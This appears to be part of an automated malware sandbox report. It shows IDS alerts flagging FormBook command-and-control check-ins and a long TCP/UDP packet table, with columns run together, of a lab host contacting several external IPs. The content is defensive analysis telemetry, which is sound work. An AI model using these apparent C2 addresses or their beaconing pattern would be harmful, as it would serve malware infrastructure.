                                                              2024-12-09T09:12:26.746209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450006103.75.185.2280TCP
                                                              2024-12-09T09:12:29.402336+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012103.75.185.2280TCP
                                                              2024-12-09T09:12:38.888222+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024162.0.213.9480TCP
                                                              2024-12-09T09:12:41.548244+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025162.0.213.9480TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 9, 2024 09:10:44.878432989 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:44.997772932 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:44.997889996 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:45.008107901 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:45.127428055 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.318923950 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319015026 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319025993 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319153070 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.319238901 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319279909 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319279909 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.319299936 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319319963 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.319333076 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.320075035 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.320100069 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.320111036 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.320122957 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.320141077 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.327419043 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:10:46.327552080 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.330759048 CET4975880192.168.2.4172.67.220.36
                                                              Dec 9, 2024 09:10:46.450006962 CET8049758172.67.220.36192.168.2.4
                                                              Dec 9, 2024 09:11:02.115461111 CET4979780192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:02.234879971 CET8049797217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:02.235321045 CET4979780192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:02.298285961 CET4979780192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:02.417562962 CET8049797217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:03.518059969 CET8049797217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:03.518261909 CET8049797217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:03.518511057 CET4979780192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:03.809747934 CET4979780192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:04.828087091 CET4980480192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:04.947510958 CET8049804217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:04.947658062 CET4980480192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:04.963036060 CET4980480192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:05.082349062 CET8049804217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:06.236061096 CET8049804217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:06.236146927 CET8049804217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:06.236207008 CET4980480192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:06.465384007 CET4980480192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:07.489845991 CET4981180192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:07.609704018 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.609816074 CET4981180192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:07.625307083 CET4981180192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:07.745060921 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745075941 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745084047 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745095015 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745193958 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745225906 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745459080 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745469093 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:07.745479107 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:08.903601885 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:08.904112101 CET8049811217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:08.904181004 CET4981180192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:09.137335062 CET4981180192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:10.156071901 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:10.275603056 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:10.275837898 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:10.285001040 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:10.404273987 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:11.632448912 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:11.632467985 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:11.632601023 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:11.632673025 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:11.632720947 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:11.635482073 CET4981880192.168.2.4217.160.0.113
                                                              Dec 9, 2024 09:11:11.754659891 CET8049818217.160.0.113192.168.2.4
                                                              Dec 9, 2024 09:11:27.003443003 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:27.122733116 CET8049858154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:27.122884035 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:27.138220072 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:27.257642031 CET8049858154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:28.652904987 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:28.708869934 CET8049858154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:28.708903074 CET8049858154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:28.708935022 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:28.708965063 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:28.772526026 CET8049858154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:28.772589922 CET4985880192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:29.671521902 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:29.790800095 CET8049864154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:29.790904045 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:29.806229115 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:29.925622940 CET8049864154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:31.308928967 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:31.386343956 CET8049864154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:31.386369944 CET8049864154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:31.386478901 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:31.386519909 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:31.428203106 CET8049864154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:31.428287029 CET4986480192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:32.327610016 CET4987180192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:32.447103024 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.449733019 CET4987180192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:32.464766026 CET4987180192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:32.584207058 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584220886 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584302902 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584314108 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584362030 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584371090 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584460020 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584469080 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:32.584564924 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:33.980808020 CET4987180192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:34.101522923 CET8049871154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:34.101573944 CET4987180192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:34.999473095 CET4987980192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:35.118876934 CET8049879154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:35.121162891 CET4987980192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:35.131052971 CET4987980192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:35.250581980 CET8049879154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:36.716455936 CET8049879154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:36.716645002 CET8049879154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:36.716697931 CET4987980192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:36.754941940 CET4987980192.168.2.4154.90.58.209
                                                              Dec 9, 2024 09:11:36.874373913 CET8049879154.90.58.209192.168.2.4
                                                              Dec 9, 2024 09:11:42.329700947 CET4989780192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:42.449143887 CET804989738.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:42.449261904 CET4989780192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:42.512797117 CET4989780192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:42.632076979 CET804989738.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:44.001899004 CET804989738.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:44.002119064 CET804989738.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:44.002219915 CET4989780192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:44.027776003 CET4989780192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:45.046372890 CET4990480192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:45.165688992 CET804990438.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:45.165772915 CET4990480192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:45.280826092 CET4990480192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:45.400119066 CET804990438.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:46.696757078 CET804990438.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:46.696914911 CET804990438.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:46.696986914 CET4990480192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:46.793457985 CET4990480192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:47.811846972 CET4991280192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:47.931195974 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:47.931277037 CET4991280192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:47.983464956 CET4991280192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:48.103205919 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103223085 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103240967 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103250980 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103303909 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103321075 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103406906 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103418112 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:48.103507042 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:49.471088886 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:49.471118927 CET804991238.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:49.471267939 CET4991280192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:49.496500969 CET4991280192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:50.514933109 CET4992080192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:50.634174109 CET804992038.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:50.634330988 CET4992080192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:50.644700050 CET4992080192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:50.764044046 CET804992038.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:52.245742083 CET804992038.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:52.245758057 CET804992038.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:11:52.246161938 CET4992080192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:52.249083996 CET4992080192.168.2.438.181.21.178
                                                              Dec 9, 2024 09:11:52.368262053 CET804992038.181.21.178192.168.2.4
                                                              Dec 9, 2024 09:12:07.355369091 CET4995880192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:07.475042105 CET804995823.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:07.478838921 CET4995880192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:07.494719982 CET4995880192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:07.614042997 CET804995823.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:08.371731043 CET804995823.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:08.371814013 CET4995880192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:08.996192932 CET4995880192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:09.116555929 CET804995823.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:10.020797968 CET4996780192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:10.140232086 CET804996723.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:10.140324116 CET4996780192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:10.155463934 CET4996780192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:10.274835110 CET804996723.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:11.033076048 CET804996723.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:11.033303022 CET4996780192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:11.668123960 CET4996780192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:11.787334919 CET804996723.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.688174009 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:12.807436943 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.807580948 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:12.826097965 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:12.947016001 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.947304010 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.947443962 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.947453022 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.947463036 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.948688984 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.948698997 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.948935032 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:12.948944092 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:13.701159954 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:13.701205969 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:14.340120077 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:14.459527016 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:15.358370066 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.477683067 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:15.477799892 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.487700939 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.606956959 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:16.369808912 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:16.369916916 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:16.371364117 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:16.490622044 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:22.452389002 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.571711063 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:22.571851969 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.587277889 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.706671953 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.090048075 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143306017 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143388033 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143455029 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143471003 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143472910 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143529892 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.209475994 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.209582090 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.108520031 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.227979898 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:25.228101015 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.243978977 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.363338947 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.746208906 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804797888 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804862022 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804867983 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804913998 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804920912 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804955959 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.865675926 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.865792990 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.764802933 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.884443998 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:27.884557009 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.900866032 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:28.020390987 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020406961 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020425081 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020433903 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020565987 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020596027 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020649910 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020658970 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020684004 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:29.402335882 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:29.454633951 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:29.454695940 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:29.521544933 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:30.420886993 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.540297985 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:30.540538073 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.549448967 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.668721914 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109389067 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109437943 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109529972 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109586954 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.109633923 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.112380028 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.231664896 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:37.522342920 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.641690016 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:37.641796112 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.657143116 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.776437044 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888055086 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888160944 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888174057 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888221979 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.888446093 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888458967 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888469934 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888493061 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.888534069 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.889301062 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889312983 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889322042 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889333010 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889349937 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.889375925 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.008033991 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.008058071 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.008209944 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.012096882 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.012177944 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.012217045 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.020368099 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.074126959 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.080373049 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.080437899 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.080482006 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.082990885 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.083041906 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.167825937 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.186613083 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.308595896 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:40.308677912 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.347446918 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.466835022 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548085928 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548204899 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548216105 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548243999 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.548430920 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548444033 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548455954 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548468113 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548474073 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.548506975 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.549077034 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549088955 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549115896 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.549331903 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549374104 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.667767048 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.667866945 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.667912006 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.671984911 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.672061920 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.672102928 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.740274906 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.740324020 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.740362883 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.742904902 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.742949963 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:42.261692047 CET5002580192.168.2.4162.0.213.94

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 9, 2024 09:10:44.557074070 CET6097853192.168.2.41.1.1.1
